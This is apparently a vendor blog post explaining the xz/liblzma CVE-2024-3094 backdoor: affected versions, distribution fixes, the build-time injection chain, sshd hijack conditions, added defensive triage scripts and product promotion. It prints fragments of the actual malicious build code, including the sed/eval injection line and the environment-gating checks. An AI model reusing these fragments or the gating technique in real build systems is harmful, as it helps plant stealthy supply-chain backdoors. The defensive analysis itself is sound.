CVE-2024-3094: A Backdoor in XZ Utils Leads to Remote Code Execution


On March 29, 2024, CISA reported a critical supply chain compromise identified as CVE-2024-3094, affecting the XZ Utils data compression library [1]. This vulnerability, with a CVSS score of 10.0 (Critical), introduces a backdoor that could allow attackers to bypass SSH authentication and execute remote code on affected systems [2]. CVE-2024-3094 affects XZ Utils versions 5.6.0 and 5.6.1; organizations are advised to downgrade to a secure version, such as 5.4.6, to prevent potential exploitation [3].

In this blog, we explain how the XZ Utils CVE-2024-3094 exploit works and how organizations can defend against CVE-2024-3094 attacks.

CVE-2024-3094: Backdoor in XZ Utils Explained

The CVE-2024-3094 vulnerability is a sophisticated backdoor embedded within versions 5.6.0 and 5.6.1 of the XZ Utils library, affecting the liblzma component. The backdoor is absent from the project's source repository and was introduced in the distributed release tarballs; it is activated during the library's build process through an obfuscated script. This script, hidden within a test file, extracts a malicious object file and links it into the library, modifying its behavior.

Targeting only x86-64 Linux systems during Debian or RPM package builds, the backdoor undermines the integrity of applications that rely on liblzma, most notably OpenSSH where sshd is linked with libsystemd, which in turn depends on liblzma. The backdoor's execution is conditional, designed to evade detection and analysis; if triggered, it alters liblzma's function calls, which can lead to SSH authentication bypass or unauthorized remote code execution, posing a significant security risk to affected systems.

All Affected Products for the CVE-2024-3094 RCE Vulnerability

Here are the systems that are affected by the CVE-2024-3094 RCE vulnerability, with references to their advisories.

OS                                    | Package           | Versions           | Fix Package Version
--------------------------------------|-------------------|--------------------|--------------------------------------------------
Fedora 40, Rawhide                    | xz                | 5.6.0, 5.6.1       | Revert to 5.4.x [4]
Arch Linux                            | xz                | 5.6.0-1, 5.6.1-1   | Upgrade to 5.6.1-2 [5]
Debian unstable (Sid)                 | xz-utils          | 5.6.1              | Revert to 5.4.5 [6]
RedHat                                | RHEL not affected |                    | RedHat advises its users to stop using Fedora 40 or Fedora Rawhide until they can downgrade their xz version.
Alpine edge                           | xz                | 5.6.1-r2           | Revert to 5.4.x; 5.6.0-r2, 5.6.1-r2 [7]
openSUSE Tumbleweed, openSUSE MicroOS | xz                | 5.6.0              | Revert to 5.4.x [8]
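The two signals a responder checks first on a Linux host are the installed xz version (only upstream 5.6.0 and 5.6.1 carry the backdoor) and whether sshd actually loads liblzma, since that is the path through which the backdoor reaches the SSH daemon. The following POSIX shell script is an added example written for this post, not code from Picus or from the xz project. It assumes that the first line of `xz --version` looks like "xz (XZ Utils) 5.6.1" and that `ldd /usr/sbin/sshd` prints one shared library per line; the sample inputs at the bottom are constructed, not captured from a real host.

```shell
#!/bin/sh
# Added example: triage helpers for CVE-2024-3094 (not from the Picus post).
# Assumptions: "xz --version" prints a first line such as "xz (XZ Utils) 5.6.1",
# and "ldd /usr/sbin/sshd" prints one "name => path (addr)" entry per line.

# Classify the first line of "xz --version". Only upstream 5.6.0 and 5.6.1
# carry the backdoor; note that a distro revision such as Arch's 5.6.1-2 is
# already fixed, so confirm against the distribution advisory as well.
xz_version_status() {
    version=$(printf '%s\n' "$1" | sed -n 's/^xz (XZ Utils) \([0-9][0-9.]*\).*$/\1/p')
    case "$version" in
        5.6.0|5.6.1) echo "affected" ;;
        "")          echo "unknown" ;;
        *)           echo "unaffected" ;;
    esac
}

# Succeed (exit 0) if ldd output shows sshd pulling in liblzma. On affected
# distributions this happens indirectly through libsystemd.
sshd_links_liblzma() {
    printf '%s\n' "$1" | grep -q 'liblzma\.so'
}

# Combine both signals into a single verdict:
#   at-risk               : backdoored liblzma and sshd loads it
#   affected-library-only : backdoored liblzma installed, but sshd does not load it
#   ok                    : xz version is outside the affected range
triage() {
    status=$(xz_version_status "$1")
    if [ "$status" = affected ] && sshd_links_liblzma "$2"; then
        echo "at-risk"
    elif [ "$status" = affected ]; then
        echo "affected-library-only"
    else
        echo "ok"
    fi
}

# Constructed sample inputs (not captured from a real host).
SAMPLE_XZ='xz (XZ Utils) 5.6.1'
SAMPLE_LDD='    linux-vdso.so.1 (0x00007ffd1a3f0000)
    libsystemd.so.0 => /lib/x86_64-linux-gnu/libsystemd.so.0 (0x00007f1d2c000000)
    liblzma.so.5 => /lib/x86_64-linux-gnu/liblzma.so.5 (0x00007f1d2bfc0000)
    libc.so.6 => /lib/x86_64-linux-gnu/libc.so.6 (0x00007f1d2bd00000)'

# On a live host you would call:
#   triage "$(xz --version 2>/dev/null | head -n 1)" "$(ldd /usr/sbin/sshd 2>/dev/null)"
triage "$SAMPLE_XZ" "$SAMPLE_LDD"   # prints: at-risk
```

The verdict is deliberately conservative: an "ok" from the version check only says the host is outside the 5.6.0/5.6.1 range, and "affected-library-only" still calls for the downgrade the advisories recommend, because any other liblzma consumer built on that host is suspect.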

Proof-of-Concept (PoC) for CVE-2024-3094 Exploit in XZ Utils: How a Backdoor Leads to SSHD Compromise

Here is the full attack lifecycle of the CVE-2024-3094 exploit.

You can also follow the two-year attack timeline in [9], starting with the creation of the GitHub user account Jia Tan (JiaT75), which was used to insert the backdoor while making seemingly legitimate contributions to multiple projects.

The attack starts by modifying the build-to-host.m4 script within the build system of the xz utility. This script is responsible for part of the build process that configures the software for the host system.

Within the build-to-host.m4 script, the following line is the vector for code injection.

gl_[$1]_config='sed "r\n" $gl_am_configmake | eval $gl_path_map | $gl_[$1]_prefix -d 2>/dev/null'

This line uses a pipeline (|) to pass the output of a sed command through further shell evaluation, manipulating the configuration process.

Essentially, it is set up to inject an obfuscated script that runs at the end of the configure script. The obfuscation is critical because it hides the malicious intent from a cursory inspection.

As the configure script runs, it executes the previously injected obfuscated code. This code is crafted to detect if it's running in a specific environment:

  • It ensures that the system is a 64-bit Linux environment (x86-64) [10].

if ! (echo "$build" | grep -Eq "^x86_64" > /dev/null 2>&1) && (echo "$build" | grep -Eq "linux-gnu$" > /dev/null 2>&1);then

  • It checks if it is part of a Debian or RPM package build process [10].

if test -f "$srcdir/debian/rules" || test "x$RPM_ARCH" = "xx86_64";then

The obfuscated code within the configure script is set to only install the backdoor under the conditions mentioned above. These checks are designed to make it difficult for researchers to reproduce the problem and, hence, analyze the backdoor, as it will not install in other environments.
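To make the gating concrete, here is a small POSIX shell predicate, added for this post and not taken from Picus or from the xz project, that encodes the two build-time conditions as the text describes them: an x86-64 linux-gnu build triple, and a Debian (debian/rules present) or RPM (RPM_ARCH set to x86_64) packaging build. The parameter names mirror the `$build`, `$srcdir` and `$RPM_ARCH` variables in the quoted snippet; the scenario directories it creates are constructed scratch trees, not real source checkouts. Running it shows why a plain `./configure && make` on a developer workstation, or any build on a non-x86-64 host, never produced the backdoored liblzma.

```shell
#!/bin/sh
# Added example (not from the Picus post or the xz project): evaluates the two
# build-time conditions the backdoored configure script gates on.
# Inputs:
#   $1 = autoconf build triple ($build), e.g. x86_64-pc-linux-gnu
#   $2 = source directory ($srcdir); a debian/rules file marks a Debian build
#   $3 = value of RPM_ARCH, which rpmbuild exports during an RPM build

# Condition 1: the build triple starts with x86_64 and ends with linux-gnu.
is_x86_64_linux() {
    printf '%s\n' "$1" | grep -Eq '^x86_64' &&
        printf '%s\n' "$1" | grep -Eq 'linux-gnu$'
}

# Condition 2: a Debian packaging tree, or an RPM build for x86_64.
is_deb_or_rpm_build() {
    test -f "$1/debian/rules" || test "x$2" = "xx86_64"
}

# Prints "would-activate" when both conditions hold, otherwise "dormant".
backdoor_activation_state() {
    if is_x86_64_linux "$1" && is_deb_or_rpm_build "$2" "$3"; then
        echo "would-activate"
    else
        echo "dormant"
    fi
}

# Constructed scenarios: an empty directory stands in for a plain tarball
# build, a directory containing debian/rules for a Debian packaging build.
scratch=$(mktemp -d)
mkdir -p "$scratch/deb/debian" && : > "$scratch/deb/debian/rules"
mkdir -p "$scratch/plain"

backdoor_activation_state x86_64-pc-linux-gnu       "$scratch/deb"   ""      # would-activate (Debian)
backdoor_activation_state x86_64-pc-linux-gnu       "$scratch/plain" x86_64  # would-activate (RPM)
backdoor_activation_state x86_64-pc-linux-gnu       "$scratch/plain" ""      # dormant (plain build)
backdoor_activation_state aarch64-unknown-linux-gnu "$scratch/deb"   ""      # dormant (not x86-64)
backdoor_activation_state x86_64-apple-darwin23     "$scratch/deb"   ""      # dormant (not linux-gnu)

rm -rf "$scratch"
```

The practical lesson for defenders is that build-environment-dependent behaviour is itself a red flag: a reproducible-build comparison between a package built inside the packaging pipeline and one built from the same tarball outside it would have shown a differing liblzma.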

If the conditions are met, the code proceeds to modify the Makefile for liblzma. The manipulation targets the symbol resolution process, redirecting the RSA_public_decrypt@....plt symbol to a backdoor payload instead of the legitimate code.

When sshd (the SSH daemon) performs public key authentication, it calls the RSA_public_decrypt function. Because of the manipulation introduced at build time, this call is redirected to the attacker's code.

The malicious code attempts to extract and verify a payload embedded within the public key presented by the client. After verification, the payload is passed to libc's system() function, which executes arbitrary commands, leading to remote code execution (RCE).

Several runtime conditions must also hold for the exploit to execute:

  • The TERM environment variable must not be set.
  • The running binary path (argv[0]) must be /usr/sbin/sshd.
  • The LD_DEBUG and LD_PROFILE environment variables must not be set.
  • The LANG environment variable must be set.
  • Debugging tools such as rr and gdb must not be detected.

If all runtime requirements are met and the payload is verified, the malicious code executes it via system(), leading to RCE. The RCE itself is unremarkable: commands are passed to libc's system() function, a legitimate routine commonly used to run shell commands from C programs, which is one reason the call does not stand out on its own.

How Picus Helps Simulate XZ Utils CVE-2024-3094 Remote Code Execution (RCE) Attacks

We also strongly suggest simulating the XZ Utils CVE-2024-3094 vulnerability to test the effectiveness of your security controls against sophisticated cyber attacks using the Picus Complete Security Validation Platform. You can also test your defenses against other vulnerability exploitation attacks, such as Citrix Bleed, Follina, and Looney Tunables, within minutes with a 14-day free trial of the Picus Platform.

Picus Threat Library includes the following threats for XZ Utils CVE-2024-3094 vulnerability exploitation attacks:

Threat ID | Threat Name                                            | Attack Module
----------|--------------------------------------------------------|-------------------------------
39104     | XZ CVE-2024-3094 Liblzma Vulnerability Download Threat | Network Infiltration
32837     | XZ CVE-2024-3094 Liblzma Vulnerability Email Threat    | E-mail Infiltration (Phishing)

Picus also provides actionable mitigation content for the XZ Utils CVE-2024-3094 vulnerability exploitation attacks from a variety of vendors. The Picus Mitigation Library includes prevention signatures that address the XZ Utils CVE-2024-3094 vulnerability in preventive security controls. Picus Labs has validated the following signatures for the XZ Utils CVE-2024-3094 vulnerability:

Security Control | Signature Name                    | Signature ID
-----------------|-----------------------------------|------------------------------
F5 BIG-IP        | ELF/CVE_2024_3094.A!exploit       | 10176362
F5 BIG-IP        | PossibleThreat                    | 62183
ForcePoint       | File_Malware-Blocked              |
PaloAlto IPS     | exploit/Linux.xzbackdoor.c        | 634305801
PaloAlto IPS     | trojan/Linux.xzbackdoor.a         | 634262265
PaloAlto IPS     | trojan/Linux.xzbackdoor.b         | 634305813
PaloAlto IPS     | trojan/Linux.xzbackdoor.e         | 634305822
PaloAlto IPS     | trojan/Linux.xzbackdoor.f         | 634305870
PaloAlto IPS     | trojan/Linux.xzbackdoor.d         | 634305783
CheckPoint NGFW  | XZ Utils Backdoor (CVE-2024-3094) | asm_dynamic_prop_XZ_UTILS_RCE

Start simulating emerging threats today and get actionable mitigation insights with a 14-day free trial of the Picus Complete Security Validation Platform.

References

[1] “Reported Supply Chain Compromise Affecting XZ Utils Data Compression Library, CVE-2024-3094,” Cybersecurity and Infrastructure Security Agency CISA. Available: https://www.cisa.gov/news-events/alerts/2024/03/29/reported-supply-chain-compromise-affecting-xz-utils-data-compression-library-cve-2024-3094. [Accessed: Mar. 31, 2024]

[2] “oss-security - backdoor in upstream xz/liblzma leading to ssh server compromise.” Available: https://www.openwall.com/lists/oss-security/2024/03/29/4. [Accessed: Mar. 31, 2024]

[3] “tukaani-project/xz,” GitHub. Available: https://github.com/tukaani-project/xz. [Accessed: Mar. 31, 2024]

[4] “Urgent security alert for Fedora Linux 40 and Fedora Rawhide users,” Mar. 29, 2024. Available: https://www.redhat.com/en/blog/urgent-security-alert-fedora-41-and-rawhide-users. [Accessed: Mar. 31, 2024]

[5] “Arch Linux,” Mar. 29, 2024. Available: https://archlinux.org/news/the-xz-package-has-been-backdoored/. [Accessed: Mar. 31, 2024]

[6] “[SECURITY] [DSA 5649-1] xz-utils security update.” Available: https://lists.debian.org/debian-security-announce/2024/msg00057.html. [Accessed: Mar. 31, 2024]

[7] “Alpine Linux packages.” Available: https://pkgs.alpinelinux.org/package/edge/main/x86/xz. [Accessed: Mar. 31, 2024]

[8] “openSUSE addresses supply chain attack against xz compression library,” openSUSE News. Available: https://news.opensuse.org/2024/03/29/xz-backdoor/. [Accessed: Mar. 31, 2024]

[9] Shachar Menashe, Senior Director Security Research and Jonathan Sar Shalom, Director of Threat Research, “XZ Backdoor Attack CVE-2024-3094: All You Need To Know,” JFrog, Mar. 31, 2024. Available: https://jfrog.com/blog/xz-backdoor-attack-cve-2024-3094-all-you-need-to-know/. [Accessed: Mar. 31, 2024]

[10] “oss-security - backdoor in upstream xz/liblzma leading to ssh server compromise.” Available: https://www.openwall.com/lists/oss-security/2024/03/29/4. [Accessed: Mar. 31, 2024]